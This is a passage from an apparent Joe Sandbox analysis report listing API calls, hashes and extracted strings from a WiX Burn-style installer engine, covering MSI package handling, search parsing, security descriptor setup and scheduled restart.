                                                            • Opcode Fuzzy Hash: 1a0722c8d5d0abb82b030d93bf44fb7ab266e79791077c9d0010a2692c1f0512
                                                            • Instruction Fuzzy Hash: A4F0BB321019286AFF111A655C05B5A3748FFC37F0B18A125B815D6A91CAF0DC8181A1
                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00888BD3,0000001C,80070490,00000000,00000000,80070490), ref: 008734D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FolderPath
                                                            • String ID:
                                                            • API String ID: 1514166925-0
                                                            • Opcode ID: d912521ac713853381149e4bb94e71ca5b00ffbe9604f77fe3f95a509405fc5e
                                                            • Instruction ID: 68567945a8909c7c73d01a846d3aceab2e106a4e0448086b374917ee5b7539c7
                                                            • Opcode Fuzzy Hash: d912521ac713853381149e4bb94e71ca5b00ffbe9604f77fe3f95a509405fc5e
                                                            • Instruction Fuzzy Hash: 6CE05BB22411257BEB122F755C05DEB7B9CFF15364700C051FE48D6114D772E55097B6
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000,00000000,0087556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B2F0B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4991031f6af29a9ecb9a9090e25fc7ea83454fb1e8deb1ac6d301dffda793d01
                                                            • Instruction ID: 4f57ecb77574c05649b798a43a8ad5925ac869aad06f248ece4a39011a8681b0
                                                            • Opcode Fuzzy Hash: 4991031f6af29a9ecb9a9090e25fc7ea83454fb1e8deb1ac6d301dffda793d01
                                                            • Instruction Fuzzy Hash: F7E0FEF1927229DE8B508F6ABD454527BB8FB28B40306430FB800D2220CBB0C4418FA0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e67a7f0c8c861e21c47ef4d2c0bbf6ae18bcab126893683c7ce264b024c33823
                                                            • Instruction ID: 6a1e6d915c8b7b04e2fb013f0afceae3d9f2523a7407ea5ab720fe2f4e6b482e
                                                            • Opcode Fuzzy Hash: e67a7f0c8c861e21c47ef4d2c0bbf6ae18bcab126893683c7ce264b024c33823
                                                            • Instruction Fuzzy Hash: 73B01291268201BD3A8851882E83DB70B0CF5C1B11B31431FF2A1D1381E8840C054133
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c79dad3cf58b235eeeea4c5c8454312f741a60fdea8a79252da7d4c778af028a
                                                            • Instruction ID: bdca32a7be0a7ea8f5cec5b92e773441e9831713e07d7ea30bc3829596e4d8fb
                                                            • Opcode Fuzzy Hash: c79dad3cf58b235eeeea4c5c8454312f741a60fdea8a79252da7d4c778af028a
                                                            • Instruction Fuzzy Hash: 70B01291268105BD3A4811446CC2CB70B0CF5C2B11B31831FF2A1E0381A8800C044233
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bc10bb8497eb2e4eb3987488dbff75524daa32f12c3a58a265597492c9f06db9
                                                            • Instruction ID: 8f8e1b1c5d7c59928e7ad15d7e7c4c295b4c6bae074c9bdffc8f8d06002204bb
                                                            • Opcode Fuzzy Hash: bc10bb8497eb2e4eb3987488dbff75524daa32f12c3a58a265597492c9f06db9
                                                            • Instruction Fuzzy Hash: 09B01291268002BD368851481C43CB70B0CF1C1B11331C31FF6A1C1381E8800C094133
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,008721A8,?,00000000,?,00000000,?,0087390C,00000000,?,00000104), ref: 008714E8
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ProcessSizelstrlen
                                                            • String ID:
                                                            • API String ID: 3492610842-0
                                                            • Opcode ID: 21c6c6ecafead7b8a92d10210c7ca6fb75bb770b30ac2b13dc55188568835482
                                                            • Instruction ID: 8a3ae30c3ade7efc66b888feea6beb481717333090121fe9e74edff1df9a6b9e
                                                            • Opcode Fuzzy Hash: 21c6c6ecafead7b8a92d10210c7ca6fb75bb770b30ac2b13dc55188568835482
                                                            • Instruction Fuzzy Hash: BF01263320022CABCF115E1CDC88F9AB76AFF84764F11C215FA1EDB955C631DC008695
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 0087B11C
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,008BCA9C,000000FF,DirectorySearch,000000FF,008BCA9C,Condition,feclient.dll,008BCA9C,Variable,?,008BCA9C,008BCA9C,?,?), ref: 0087AA29
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0087AA7E
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0087AA9A
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0087AABE
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0087AB11
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0087AB2B
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0087AB53
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0087AB91
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0087ABB0
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0087ABCF
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0087AC8D
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0087ACA7
                                                              • Part of subcall function 008B32F3: VariantInit.OLEAUT32(?), ref: 008B3309
                                                              • Part of subcall function 008B32F3: SysAllocString.OLEAUT32(?), ref: 008B3325
                                                              • Part of subcall function 008B32F3: VariantClear.OLEAUT32(?), ref: 008B33AC
                                                              • Part of subcall function 008B32F3: SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0087AD06
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0087AD28
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0087AD48
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0087AE20
                                                            • SysFreeString.OLEAUT32(?), ref: 0087AFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                            • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                            • API String ID: 2748437055-56916464
                                                            • Opcode ID: 39e5ee75179c813bbb63726aaf9dd1eda48951a02c0ff129ee89967bdc161744
                                                            • Instruction ID: faa3123ca364713de47f35208bb20da7ebfa5ab28b9ee881d18124683216d12d
                                                            • Opcode Fuzzy Hash: 39e5ee75179c813bbb63726aaf9dd1eda48951a02c0ff129ee89967bdc161744
                                                            • Instruction Fuzzy Hash: 49228431D4862ABEDB219A548C46FEF7A65FB05734F208320F538F63D4DB64EA40D692
                                                            Strings
                                                            • feclient.dll, xrefs: 008942C5, 0089434D, 0089441D, 0089454B, 008947D8
                                                            • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 008945F5
                                                            • Failed to add ADMIN property on admin install., xrefs: 0089471E
                                                            • Failed to add reboot suppression property on uninstall., xrefs: 0089477D
                                                            • Failed to add patch properties to argument string., xrefs: 008944FD
                                                            • REINSTALL=ALL, xrefs: 008945D3, 0089464D
                                                            • Failed to run maintanance mode for MSI package., xrefs: 008946F6
                                                            • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0089469B
                                                            • Failed to initialize external UI handler., xrefs: 008943F4
                                                            • WixBundleExecutePackageCacheFolder, xrefs: 0089436A, 008948A4
                                                            • Failed to perform minor upgrade of MSI package., xrefs: 00894638
                                                            • Failed to add the list of dependencies to ignore to the properties., xrefs: 008946CA
                                                            • Failed to add feature action properties to obfuscated argument string., xrefs: 008944DB
                                                            • %ls %ls=ALL, xrefs: 008946B6, 00894795
                                                            • Failed to get cached path for package: %ls, xrefs: 0089434F
                                                            • ACTION=ADMIN, xrefs: 00894709
                                                            • Failed to add feature action properties to argument string., xrefs: 008944B9
                                                            • REBOOT=ReallySuppress, xrefs: 008945A0, 0089476C
                                                            • crypt32.dll, xrefs: 0089440A
                                                            • Failed to add obfuscated properties to argument string., xrefs: 00894497
                                                            • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00894687
                                                            • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0089460C
                                                            • Failed to add reinstall all property on minor upgrade., xrefs: 008945EA
                                                            • Failed to uninstall MSI package., xrefs: 008947EF
                                                            • Failed to enable logging for package: %ls to: %ls, xrefs: 0089441F
                                                            • Failed to add reboot suppression property on install., xrefs: 008945BB
                                                            • IGNOREDEPENDENCIES, xrefs: 008946A5, 00894784
                                                            • Failed to add properties to argument string., xrefs: 00894463
                                                            • Failed to build MSI path., xrefs: 0089439D
                                                            • VersionString, xrefs: 0089428E, 008942EF
                                                            • msasn1.dll, xrefs: 0089440B
                                                            • Failed to install MSI package., xrefs: 00894746
                                                            • WixBundleExecutePackageAction, xrefs: 008943B7, 008948B4
                                                            • Failed to add patch properties to obfuscated argument string., xrefs: 0089451F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                            • API String ID: 0-2033600224
                                                            • Opcode ID: 6fe4f696210e3a787e46d8d626c419c4d2dd91c38713f3f87edbe6bdf885593d
                                                            • Instruction ID: f12fe6ed24427368eb1276d0973e7397d10f17e8d5e113ce3ec486e7da0822ef
                                                            • Opcode Fuzzy Hash: 6fe4f696210e3a787e46d8d626c419c4d2dd91c38713f3f87edbe6bdf885593d
                                                            • Instruction Fuzzy Hash: E402B171940629AFDF21AEA8CC41FA9B77AFB54700F0841A5F518E7311D772EEA1CB81
                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008B17B1
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B17BB
                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008B1808
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B180E
                                                            • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 008B1848
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B184E
                                                            • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 008B188E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1894
                                                            • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008B18D4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B18DA
                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008B191A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1920
                                                            • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008B1A11
                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 008B1A4B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1A55
                                                            • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 008B1A8D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1A97
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B1AD0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1ADA
                                                            • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 008B1B18
                                                            • LocalFree.KERNEL32(?), ref: 008B1B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                            • String ID: srputil.cpp
                                                            • API String ID: 267631441-4105181634
                                                            • Opcode ID: 28b310f472f580ed41ed076f1dbfa0fb3d1b792f7ca97c82e0dd9c9b8ae83d78
                                                            • Instruction ID: 91edcb0dc38a7673e8a6ce0fd7f7d13fca46df8bfa7a4ff459c00264fdd727e4
                                                            • Opcode Fuzzy Hash: 28b310f472f580ed41ed076f1dbfa0fb3d1b792f7ca97c82e0dd9c9b8ae83d78
                                                            • Instruction Fuzzy Hash: D7C14576D4123DABDB309B959C58BDFFAB8FF44750F4102AAA905FB240D7709D408EA0
                                                            Strings
                                                            • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0089C385
                                                            • Failed to copy key for pseudo bundle., xrefs: 0089C542
                                                            • Failed to copy install arguments for related bundle package, xrefs: 0089C584
                                                            • Failed to allocate memory for dependency providers., xrefs: 0089C6DE
                                                            • Failed to copy download source for pseudo bundle., xrefs: 0089C469
                                                            • Failed to copy cache id for pseudo bundle., xrefs: 0089C55F
                                                            • -%ls, xrefs: 0089C34C
                                                            • pseudobundle.cpp, xrefs: 0089C379, 0089C3B2, 0089C4A1, 0089C6D2
                                                            • Failed to copy filename for pseudo bundle., xrefs: 0089C417
                                                            • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0089C3BE
                                                            • Failed to copy uninstall arguments for related bundle package, xrefs: 0089C623
                                                            • Failed to copy key for pseudo bundle payload., xrefs: 0089C3F3
                                                            • Failed to append relation type to repair arguments for related bundle package, xrefs: 0089C5F1
                                                            • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0089C4AD
                                                            • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0089C644
                                                            • Failed to copy version for pseudo bundle., xrefs: 0089C72D
                                                            • Failed to copy local source path for pseudo bundle., xrefs: 0089C43B
                                                            • Failed to append relation type to install arguments for related bundle package, xrefs: 0089C5A9
                                                            • Failed to copy repair arguments for related bundle package, xrefs: 0089C5D0
                                                            • Failed to copy display name for pseudo bundle., xrefs: 0089C74F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                            • API String ID: 1357844191-2832335422
                                                            • Opcode ID: e7f6bcd1f041f722cfe55919ec2631c28d4857451d36cd9e70e78f554e41e933
                                                            • Instruction ID: 16be6ac8c5c4b59a9928d660667e1b189dc9175ff42a630d156890da3fed8ee5
                                                            • Opcode Fuzzy Hash: e7f6bcd1f041f722cfe55919ec2631c28d4857451d36cd9e70e78f554e41e933
                                                            • Instruction Fuzzy Hash: 73C1E371600656BFDF15AF68C891F6A77A9FF08310B098129F919EB341DB72EC009BA1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00874617
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0087461E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00874628
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00874678
                                                            • GetLastError.KERNEL32 ref: 00874682
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 008746C6
                                                            • GetLastError.KERNEL32 ref: 008746D0
                                                            • Sleep.KERNEL32(000003E8), ref: 0087470C
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0087471D
                                                            • GetLastError.KERNEL32 ref: 00874727
                                                            • CloseHandle.KERNEL32(?), ref: 0087477D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                            • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                            • API String ID: 2241679041-1583736410
                                                            • Opcode ID: a2f386b59062f2a17db4822dcf996d679904b2a74bea14afb77eed0967b34975
                                                            • Instruction ID: 77185b7e09c5a989cba1914adf538024ceda31374e33204a08e463a4e16ad50d
                                                            • Opcode Fuzzy Hash: a2f386b59062f2a17db4822dcf996d679904b2a74bea14afb77eed0967b34975
                                                            • Instruction Fuzzy Hash: 0041EB73A40639ABE720ABA98C86B7F7B58FB01751F114225FE15F7394E7A5CC0085E2
                                                            APIs
